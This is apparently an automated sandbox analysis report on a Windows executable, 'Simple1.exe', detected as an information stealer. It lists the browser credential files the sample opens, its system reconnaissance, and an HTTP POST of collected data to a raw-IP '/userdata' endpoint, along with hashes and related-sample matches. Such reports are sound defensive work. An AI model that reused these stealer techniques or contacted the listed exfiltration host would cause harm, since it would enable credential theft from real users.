Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Simple1.exe

Overview

General Information

Sample name:Simple1.exe
Analysis ID:1569937
MD5:218954f9dd70247e51af8a30940d5c33
SHA1:35ee01d3128951c3993079186fddc9c0dbe155f7
SHA256:95ec35703d323fe972a936d9b3574bb191e94b693656d94149897c5ff35f225f
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Contains functionality to steal Chrome passwords or cookies
Tries to harvest and steal browser information (history, passwords, etc)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to enumerate network shares
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Detected potential crypto function
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)

Classification

  • System is w10x64
  • Simple1.exe (PID: 2520 cmdline: "C:\Users\user\Desktop\Simple1.exe" MD5: 218954F9DD70247E51AF8A30940D5C33)
    • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 96.4% probability
Source: Simple1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: Simple1.exe
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: Simple1.exe
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA93CD0 memset,NetUserEnum,NetApiBufferFree,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF7CEA93CD0
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
Source: unknownDNS query: name: api.ipify.org
Source: unknownDNS query: name: api.ipify.org
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownTCP traffic detected without corresponding DNS query: 185.237.165.97
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: WinHTTP/1.0Host: api.ipify.org
Source: global trafficDNS traffic detected: DNS query: api.ipify.org
Source: unknownHTTP traffic detected: POST /userdata HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WebKitFormBoundaryUser-Agent: WinHTTP/1.0Content-Length: 97217Host: 185.237.165.97
Source: Simple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/
Source: Simple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/n
Source: Simple1.exe, 00000000.00000003.2104513902.0000015426F53000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2106875074.0000015426F54000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2106875074.0000015426F4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdata
Source: Simple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdatadllz
Source: Simple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/userdataholS
Source: Simple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97/x
Source: Simple1.exe, 00000000.00000002.2106875074.0000015426F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.165.97:80/userdata
Source: Simple1.exe, 00000000.00000003.2079312766.0000015426F32000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2106875074.0000015426EFB000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080044061.0000015426F32000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
Source: Simple1.exe, 00000000.00000003.2079312766.0000015426F32000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080044061.0000015426F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/T
Source: Simple1.exe, 00000000.00000002.2106875074.0000015426EFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/nM
Source: Simple1.exe, 00000000.00000003.2079312766.0000015426F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org:80/
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA91B500_2_00007FF7CEA91B50
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA95D800_2_00007FF7CEA95D80
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA955100_2_00007FF7CEA95510
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA94E500_2_00007FF7CEA94E50
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA94A400_2_00007FF7CEA94A40
Source: classification engineClassification label: mal52.spyw.winEXE@2/1@1/2
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA93780 GetLogicalDrives,memset,GetDiskFreeSpaceExA,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF7CEA93780
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
Source: Simple1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Simple1.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Simple1.exe, 00000000.00000003.2080473707.0000015426FA4000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080180681.0000015426F7D000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080764987.0000015426F6F000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080635335.0000015426F7C000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080286887.0000015426F72000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080180681.0000015426F88000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080764987.0000015426FAE000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080473707.0000015426F94000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: unknownProcess created: C:\Users\user\Desktop\Simple1.exe "C:\Users\user\Desktop\Simple1.exe"
Source: C:\Users\user\Desktop\Simple1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: samcli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: samlib.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: Simple1.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Simple1.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Simple1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb(( source: Simple1.exe
Source: Binary string: F:\systemConfigChecker\x64\Release\systemConfigChecker.pdb source: Simple1.exe
Source: Simple1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Simple1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Simple1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Simple1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Simple1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Simple1.exeCode function: malloc,memset,GetAdaptersInfo,malloc,GetAdaptersInfo,free,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF7CEA93AA0
Source: C:\Users\user\Desktop\Simple1.exe TID: 1644Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA93560 GetSystemInfo,memset,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@G@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K@Z,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF7CEA93560
Source: Simple1.exe, 00000000.00000003.2079190470.0000015426F5F000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2104513902.0000015426F5F000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080017078.0000015426F5F000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2106875074.0000015426EFB000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2106875074.0000015426F5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\Simple1.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA9BFAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7CEA9BFAC
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA9BFAC IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7CEA9BFAC
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA9C150 SetUnhandledExceptionFilter,0_2_00007FF7CEA9C150
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA9BB00 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7CEA9BB00
Source: C:\Users\user\Desktop\Simple1.exeCode function: GetLocaleInfoA,GetLocaleInfoA,memset,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ,??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ,??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7CEA94640
Source: C:\Users\user\Desktop\Simple1.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\Simple1.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA9C1BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7CEA9C1BC
Source: C:\Users\user\Desktop\Simple1.exeCode function: 0_2_00007FF7CEA94180 GetTimeZoneInformation,memset,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF7CEA94180

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\Simple1.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_00007FF7CEA95510
Source: C:\Users\user\Desktop\Simple1.exeCode function: \AppData\Local\Chromium\User Data\Default\Login Data0_2_00007FF7CEA95510
Source: C:\Users\user\Desktop\Simple1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\times.jsonJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\Simple1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
1
Process Injection
1
Virtualization/Sandbox Evasion
2
OS Credential Dumping
1
Network Share Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
1
Credentials In Files
2
System Time Discovery
Remote Desktop Protocol1
Data from Local System
1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
DLL Side-Loading
Security Account Manager11
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDS1
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture3
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
System Network Configuration Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync25
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://185.237.165.97:80/userdata0%Avira URL Cloudsafe
http://185.237.165.97/n0%Avira URL Cloudsafe
http://185.237.165.97/userdataholS0%Avira URL Cloudsafe
http://185.237.165.97/x0%Avira URL Cloudsafe
http://185.237.165.97/0%Avira URL Cloudsafe
http://185.237.165.97/userdatadllz0%Avira URL Cloudsafe
http://185.237.165.97/userdata0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
api.ipify.org
104.26.13.205
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    http://api.ipify.org/Simple1.exe, 00000000.00000003.2079312766.0000015426F32000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2106875074.0000015426EFB000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080044061.0000015426F32000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpfalse
      high
      http://185.237.165.97/nSimple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://185.237.165.97:80/userdataSimple1.exe, 00000000.00000002.2106875074.0000015426F25000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://api.ipify.org/nMSimple1.exe, 00000000.00000002.2106875074.0000015426EFB000.00000004.00000020.00020000.00000000.sdmpfalse
        high
        http://185.237.165.97/userdatadllzSimple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        unknown
        http://api.ipify.org:80/Simple1.exe, 00000000.00000003.2079312766.0000015426F25000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          http://185.237.165.97/Simple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/userdataSimple1.exe, 00000000.00000003.2104513902.0000015426F53000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2106875074.0000015426F54000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000002.2106875074.0000015426F4C000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://185.237.165.97/userdataholSSimple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://api.ipify.org/TSimple1.exe, 00000000.00000003.2079312766.0000015426F32000.00000004.00000020.00020000.00000000.sdmp, Simple1.exe, 00000000.00000003.2080044061.0000015426F32000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://185.237.165.97/xSimple1.exe, 00000000.00000002.2106875074.0000015426F32000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            185.237.165.97
            unknownFrance
            52195AP-MEDIA-ASPLfalse
            104.26.13.205
            api.ipify.orgUnited States
            13335CLOUDFLARENETUSfalse
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1569937
            Start date and time:2024-12-06 11:45:24 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 2m 17s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:3
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:Simple1.exe
            Detection:MAL
            Classification:mal52.spyw.winEXE@2/1@1/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 31
            • Number of non-executed functions: 17
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Stop behavior analysis, all processes terminated
            • Exclude process from analysis (whitelisted): dllhost.exe
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtReadVirtualMemory calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • VT rate limit hit for: Simple1.exe
            TimeTypeDescription
            05:46:19API Interceptor1x Sleep call for process: Simple1.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            185.237.165.97Simple2.exeGet hashmaliciousUnknownBrowse
            • 185.237.165.97/userdata
            Simple2.exeGet hashmaliciousUnknownBrowse
            • 185.237.165.97/userdata
            104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousRDPWrap ToolBrowse
            • api.ipify.org/
            Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousUnknownBrowse
            • api.ipify.org/
            file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
            • api.ipify.org/
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            api.ipify.orgSimple2.exeGet hashmaliciousUnknownBrowse
            • 104.26.12.205
            Simple2.exeGet hashmaliciousUnknownBrowse
            • 172.67.74.152
            kYGxoN4JVW.batGet hashmaliciousUnknownBrowse
            • 172.67.74.152
            REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            PO54782322024.exeGet hashmaliciousAgentTeslaBrowse
            • 172.67.74.152
            https://assets-gbr.mkt.dynamics.com/cc57758b-ada1-ef11-8a64-000d3a872ba0/digitalassets/standaloneforms/7608c709-85a2-ef11-8a69-7c1e5279b2ddGet hashmaliciousEvilProxy, HTMLPhisherBrowse
            • 104.26.13.205
            https://url.us.m.mimecastprotect.com/s/tWC_CNkXmJcoqkvlsmfBIyQP6j?domain=assets-gbr.mkt.dynamics.comGet hashmaliciousEvilProxy, HTMLPhisherBrowse
            • 104.26.13.205
            lC7L7oBBMC.exeGet hashmaliciousAgentTeslaBrowse
            • 104.26.13.205
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUSNGVW0QXQSn.lnkGet hashmaliciousUnknownBrowse
            • 104.18.11.207
            EU2Yvx0L9q.lnkGet hashmaliciousUnknownBrowse
            • 104.18.11.207
            0XyV1vWJn6.lnkGet hashmaliciousUnknownBrowse
            • 104.18.11.207
            file.exeGet hashmaliciousLummaC StealerBrowse
            • 104.21.16.9
            QD40FIJ8QK.lnkGet hashmaliciousUnknownBrowse
            • 104.17.112.233
            3fo6GN17jm.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Nymaim, StealcBrowse
            • 104.21.16.9
            az10.exeGet hashmaliciousUnknownBrowse
            • 104.20.23.46
            TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
            • 104.21.67.152
            https://mmrtb.com/bonus/com-fr-1537/carrier/bundle_fr-5.jsGet hashmaliciousUnknownBrowse
            • 172.67.168.88
            https://mmrtb.com/bonus/com-fr-1537/carrier/bundle_fr-5.jsGet hashmaliciousUnknownBrowse
            • 172.67.168.88
            AP-MEDIA-ASPLSimple2.exeGet hashmaliciousUnknownBrowse
            • 185.237.165.97
            Simple2.exeGet hashmaliciousUnknownBrowse
            • 185.237.165.97
            x86.elfGet hashmaliciousMirai, MoobotBrowse
            • 46.149.221.180
            file.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
            • 185.237.165.180
            pjczQr2H3P.exeGet hashmaliciousSocks5SystemzBrowse
            • 185.237.165.53
            9TSh73ulR1.exeGet hashmaliciousSocks5SystemzBrowse
            • 185.237.165.53
            0o37tv6BhU.elfGet hashmaliciousMiraiBrowse
            • 46.149.221.189
            YZfB2vyTrR.elfGet hashmaliciousMiraiBrowse
            • 46.149.221.169
            No context
            No context
            Process:C:\Users\user\Desktop\Simple1.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):990
            Entropy (8bit):4.8184510556594695
            Encrypted:false
